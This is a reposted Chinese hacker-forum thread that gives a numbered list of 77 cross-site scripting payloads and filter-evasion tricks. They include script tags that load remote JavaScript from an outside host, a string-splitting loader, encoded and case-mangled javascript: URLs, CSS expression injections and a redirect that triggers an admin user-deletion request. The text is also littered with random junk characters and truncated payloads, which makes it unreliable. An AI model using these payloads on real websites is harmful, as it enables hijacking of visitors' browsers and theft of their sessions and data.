貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
- U/ x8 v. E$ X; P, w" u: e- g(1)普通的XSS JavaScript注入
" l# N* ? i7 [: s" Z9 t( s6 p6 Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& O+ t# Z( r1 o2 h; H9 q. m& Z(2)IMG标签XSS使用JavaScript命令( M6 N# ^" g" n0 }( T: K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" V0 `3 b# m6 J4 g, h(3)IMG标签无分号无引号
2 U7 W2 ~0 | o* i2 w<IMG SRC=javascript:alert(‘XSS’)>- J4 m- y1 v0 ~
(4)IMG标签大小写不敏感( o4 B6 a7 a1 E' P
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) a7 s# W; j' Q- \7 x* A; i# K% n
(5)HTML编码(必须有分号)
; s7 n! l0 `- v" w! R: ^" j) M<IMG SRC=javascript:alert(“XSS”)>- `1 U$ I9 L1 }# U- I
(6)修正缺陷IMG标签$ E6 T3 P/ ?# \- i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 @% U" W) Z: c8 e7 q0 c( H H3 v7 T) r
; M- y8 Q% x4 s: @: p
(7)formCharCode标签(计算器)/ h9 ^. @ W7 \% b0 @6 O
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( Z, D3 U2 |! Z* Q(8)UTF-8的Unicode编码(计算器)3 T- _/ Q6 K3 i' j) ? k9 }
<IMG SRC=jav..省略..S')>: r2 ^1 P2 n/ P* _, R' K( S
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)4 i4 Q# L+ K0 ^
<IMG SRC=jav..省略..S')># [* |3 a( }6 T6 c! K9 W4 _
(10)十六进制编码也是没有分号(计算器): D; {1 f" Z$ I
<IMG SRC=java..省略..XSS')>0 Y; P" U1 p+ k2 F
(11)嵌入式标签,将Javascript分开' a8 U4 i, ?( `# L
<IMG SRC=”jav ascript:alert(‘XSS’);”>- U$ k0 d1 E8 y. n9 p$ M
(12)嵌入式编码标签,将Javascript分开
/ S* ~0 A) v, N; h/ V<IMG SRC=”jav ascript:alert(‘XSS’);”>' J4 k6 e" [) z0 S2 p8 D8 J% p3 D! i7 [
(13)嵌入式换行符. ?( R* f5 y0 V) c( R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ Z8 [7 d9 X( A) ?(14)嵌入式回车) k% ?( v/ G" L4 b: K7 C" Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 c. _. I5 z9 Z4 U5 A _! b(15)嵌入式多行注入JavaScript,这是XSS极端的例子& n5 ]: L4 M. Q0 U3 ]+ F
<IMG SRC=”javascript:alert(‘XSS‘)”>6 @8 m: J0 V" V3 s
(16)解决限制字符(要求同页面)
6 `- ~4 R+ i, J8 |% e8 ^, e<script>z=’document.’</script>( _* J* |3 o% G. g" D3 `1 g, ?# f, o
<script>z=z+’write(“‘</script>
1 {. M1 b: U5 ]: i<script>z=z+’<script’</script>
! R0 X1 ?& [7 k0 e1 ?<script>z=z+’ src=ht’</script>. O5 C, O! G( y/ r7 L
<script>z=z+’tp://ww’</script>. [$ W5 [1 i+ h+ F' o9 f( f
<script>z=z+’w.shell’</script>1 N: x q& u5 }: M
<script>z=z+’.net/1.’</script>) p. F" }6 [0 ~7 X/ G
<script>z=z+’js></sc’</script>
& b( @) P% x1 q1 a<script>z=z+’ript>”)’</script>
+ j5 n. B; _- U: M<script>eval_r(z)</script>! h, N" l4 o/ I# {
(17)空字符12-7-1 T00LS - Powered by Discuz! Board7 w/ |4 }& Z/ w- R( M+ z- A
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
3 z5 k5 t5 E( `3 l( a9 Yperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ p& S* S4 K8 `, [8 E( `(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用+ X/ \! V1 f9 _! f/ L8 K- A- Z6 s z) a
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ \$ q) M, G: V0 L$ l
(19)Spaces和meta前的IMG标签% c( j* M* n& G) t: B! N0 c
<IMG SRC=” javascript:alert(‘XSS’);”>
/ y/ f n1 w1 F/ ?& X1 k0 K. @, H. y(20)Non-alpha-non-digit XSS6 f& w5 b/ x, ^+ Z
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># q! P9 K+ ^" P2 R3 B
(21)Non-alpha-non-digit XSS to 2* V9 x- `) z% r* I
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>" Q% j t D- c6 ]2 g
(22)Non-alpha-non-digit XSS to 3
8 J2 \ f, O' o( ]# I* o# l- c<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT># X' r/ i6 `' }$ Y' T1 u, Z4 r
(23)双开括号- f9 F& | N$ x# H4 D( V4 e9 A
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
7 P( f# F3 Y- ~$ {" q(24)无结束脚本标记(仅火狐等浏览器)+ U% X" L& _6 N X4 L
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! Z: s, p0 U9 `2 l6 \' K(25)无结束脚本标记2
6 U, l! a8 z u+ U<SCRIPT SRC=//3w.org/XSS/xss.js>/ A+ n. s' P0 s2 Y9 k) e! P, p+ ]. l* w) @8 H
(26)半开的HTML/JavaScript XSS
$ b/ i0 l- @4 u5 y<IMG SRC=”javascript:alert(‘XSS’)”$ O; n8 H+ O: v0 Q: X' b) ?
(27)双开角括号
" q# i3 m9 s! F7 a! ?<iframe src=http://3w.org/XSS.html <1 u3 C7 f2 P$ r/ Y/ h
(28)无单引号 双引号 分号( n: S' b5 W' L
<SCRIPT>a=/XSS/
. H; `) ~/ Y7 P. S: s+ O( Calert(a.source)</SCRIPT>1 W' i# G7 A0 ^# A2 l# o& m
(29)换码过滤的JavaScript
$ T( E4 U! I3 |. y% P/ Z\”;alert(‘XSS’);//- l2 Z8 n; s4 h4 Q1 q" H, i) o
(30)结束Title标签. X7 e& \7 ~4 [* w7 l' w
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
. G/ B8 w( U( R: o# D(31)Input Image; h, c* k% q3 j6 K$ g+ q9 f c$ v- }8 W
<INPUT SRC=”javascript:alert(‘XSS’);”>
1 ?$ s$ e. c0 Y* q5 a5 E(32)BODY Image* Y" q' {5 _% f6 @! E l" ~' p5 W
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 P. E- [7 F/ M
(33)BODY标签
4 N& ]: Q/ S$ [5 F<BODY(‘XSS’)>( f' a6 j+ B& z' Z7 M) N
(34)IMG Dynsrc4 J) C$ M7 \, Y1 S' _! z
<IMG DYNSRC=”javascript:alert(‘XSS’)”>4 s6 [! d0 Z- \; S7 Z7 y
(35)IMG Lowsrc/ @# z+ d I! d; O; n3 o8 o/ B! B
<IMG LOWSRC=”javascript:alert(‘XSS’)”>! Z+ {" c% U. E: t2 T- J9 Y
(36)BGSOUND
+ x& t0 [( Q6 c, t<BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ ~' c# E6 F. F* c0 e(37)STYLE sheet' @. N8 Y7 }+ @/ g! d) z
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> I; r4 J/ |1 L$ T. [7 u" k
(38)远程样式表
- p# H! J9 r+ Y, t<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>' U! V1 V& l4 ^$ { u4 p
(39)List-style-image(列表式)
7 ?2 J8 U/ z$ @<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# T4 `1 y& T6 ?(40)IMG VBscript# _$ b/ R: T( M$ d- E
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- H) q5 n* b2 d1 P5 O# l" S- m, u(41)META链接url! E+ u6 j% u' s' @0 D1 B
: C! o7 N0 k$ y8 l: u0 r
! Q. J/ w) ]$ E5 q<META HTTP-EQUIV=”refresh” CONTENT=”0;
9 g9 W) y3 q& F) GURL=http://;URL=javascript:alert(‘XSS’);”>) l% a- O8 S4 W+ D' m! w
(42)Iframe
" n7 _: _/ j% j) X/ I<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" p7 m3 W3 T# J/ R1 o* P) i9 f8 a(43)Frame* K9 C, I: _( i$ l S3 R2 \1 R
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
! Y4 E7 a' ]$ {0 ~; a) G" y, Chttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
0 C, b; |( }- m(44)Table
. K/ F1 }9 ?- r+ F* X# d; D<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 N" R* e1 ]: u% ~# y) `6 q
(45)TD2 ?5 i; t: |/ P ^
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
" e* d- k7 p, k# D6 p- G( ?(46)DIV background-image1 x/ K4 c9 \: l4 r
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 w c7 _. f; S6 @(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
" y/ a l' r i- |: W& h8&13&12288&65279)
6 J) \( ^- B7 F% V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 I X. T) Q# A$ z9 E2 {/ r7 ^
(48)DIV expression
! ^) i3 f( x. j+ A. o<DIV STYLE=”width: expression_r(alert(‘XSS’));”>; \* q _! W+ V/ C
(49)STYLE属性分拆表达
6 t+ J' _8 H/ n<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ t- R: Q9 o9 v* L0 j; a. w(50)匿名STYLE(组成:开角号和一个字母开头)0 b. o {6 v2 K- P8 e6 t; w# ]
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>) r, y, b) t# i' v% Z1 h' v6 p4 P
(51)STYLE background-image6 k5 x2 {. \1 L4 H0 c7 W+ l, R! t) Y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
* `6 R# l5 r( j6 n" XCLASS=XSS></A>
1 ]9 x$ i; k" \1 c+ U(52)IMG STYLE方式$ |( B8 Y8 N' N9 j9 d! |
exppression(alert(“XSS”))’>
! _* R7 M( m( S3 o(53)STYLE background4 E, F7 Q" i/ D9 |
<STYLE><STYLE _: l/ ?1 H: K- c" l% p2 C9 ~
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 J3 i! I% l1 I9 e( g2 S9 N0 |* F
(54)BASE
- `7 @" X4 z8 y; {<BASE HREF=”javascript:alert(‘XSS’);//”>
* M V4 }/ i6 q. w' j3 D% M(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS/ J5 e% a m% g
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>. Q3 [1 |' w1 l( b* _' v2 u
(56)在flash中使用ActionScrpt可以混进你XSS的代码3 c" n# W; @# u5 _6 h0 f8 X
a=”get”;! L8 O. A( e, t7 M0 V0 v
b=”URL(\”";
: n: t+ p ]" z8 Wc=”javascript:”;
6 v; f+ o* o( B Bd=”alert(‘XSS’);\”)”;
2 ^+ s, P5 L. b6 d! V% leval_r(a+b+c+d);" `! r, L/ a1 ^2 `, \0 C; p" q
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 @( ^# f. R* T. i5 o8 M+ K7 q: ?9 y
<HTML xmlns:xss>
% J- P: L1 s0 E* r, T, Z. V9 P: J& L+ F<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. q( e! s) D7 q9 v<xss:xss>XSS</xss:xss>
8 R2 ^" Q3 U& I1 C( l</HTML>. R7 L# D" a" Z/ n) A
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用. \: U4 ]2 ?6 f1 [# e) W
<SCRIPT SRC=””></SCRIPT># A/ ^* k7 Y5 X, I/ [ v
(59)IMG嵌入式命令,可执行任意命令
# M, @4 h5 t9 Q [7 M<IMG SRC=”http://www.XXX.com/a.php?a=b”>( X/ A8 T; F" m$ H4 a
(60)IMG嵌入式命令(a.jpg在同服务器)
$ z/ ]7 Q) z. l( ^* QRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser* K9 Q/ `: A" ~& G# t1 X& @
(61)绕符号过滤" g. `& u0 s& A8 {2 O
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' p6 N3 h4 r8 ~& r4 f, @
(62) f8 K% F% R5 C4 B+ Z+ E4 a
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 N# E, I$ Z1 q8 a$ D! F+ D% q8 m( Z(63)6 U: w: G! U: \% `& C0 [
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>0 g7 o/ p; M6 I4 G9 E
(64)
, n; {2 k8 L# Q; U<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>& a, f8 D) E& ?
(65)
* d% G' x0 j7 G& M2 ?<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, o- ?& K& }2 F1 ?
(66)12-7-1 T00LS - Powered by Discuz! Board: y% ~' H6 v3 A- Z: }3 D" v. e
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
* d# ~% l2 N" R) D/ i* c<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 N! V' ~! s& W5 g4 }1 e# n(67)
6 ~4 W- |+ o. x# q+ q: E$ u<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
6 y; X5 I7 S* Q; q& B. A; f# I5 Y</SCRIPT>
& z+ S' _1 V% j# M(68)URL绕行0 d1 `% o1 k U; f$ ]4 V- l( G
<A HREF=”http://127.0.0.1/”>XSS</A>
( L3 S: ^: b: u% [* V k) q+ m(69)URL编码$ Y, w8 l9 y/ C) I, ^$ _
<A HREF=”http://3w.org”>XSS</A>
+ d2 G. I. `+ I% R(70)IP十进制
) d) ]& C! v5 T: Z<A HREF=”http://3232235521″>XSS</A>
* B U: ]" O/ J, y(71)IP十六进制9 O- M; N- w/ o8 _) l
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># {" k% y8 B6 h% g0 _& h5 M
(72)IP八进制3 G0 u; V5 q3 G" F4 d+ S
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
; P( c# j! \0 O$ {$ `7 n8 u1 D(73)混合编码% T, f9 e% m3 j2 A- {
<A HREF=”h0 S; J! O. Z9 H- x2 z" R
tt p://6 6.000146.0×7.147/”">XSS</A>' z6 d" U% d2 J3 m& ?
(74)节省[http:]
3 |) H2 Q! O! X" q' g$ ]3 e<A HREF=”//www.google.com/”>XSS</A>$ l! |, i+ h$ r0 Z* I7 Z; v6 s
(75)节省[www] E4 z4 [' u- \! L& H* j
<A HREF=”http://google.com/”>XSS</A>: v2 s4 ~6 E& O+ I
(76)绝对点绝对DNS
. I; I( c- I* q<A HREF=”http://www.google.com./”>XSS</A>. Q1 N2 b: U! s8 i, |0 H2 o
(77)javascript链接# d2 z$ w: C& S4 q- w
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
5 z/ N& W/ q2 }8 `
9 x# S/ F" c6 H, g原文地址:http://fuzzexp.org/u/0day/?p=14
; _' R7 i9 i# y4 T' ?
5 s) @! Q/ q& o! e, W0 N |
发表于 2013-4-19 19:22:37
收藏
支持
反对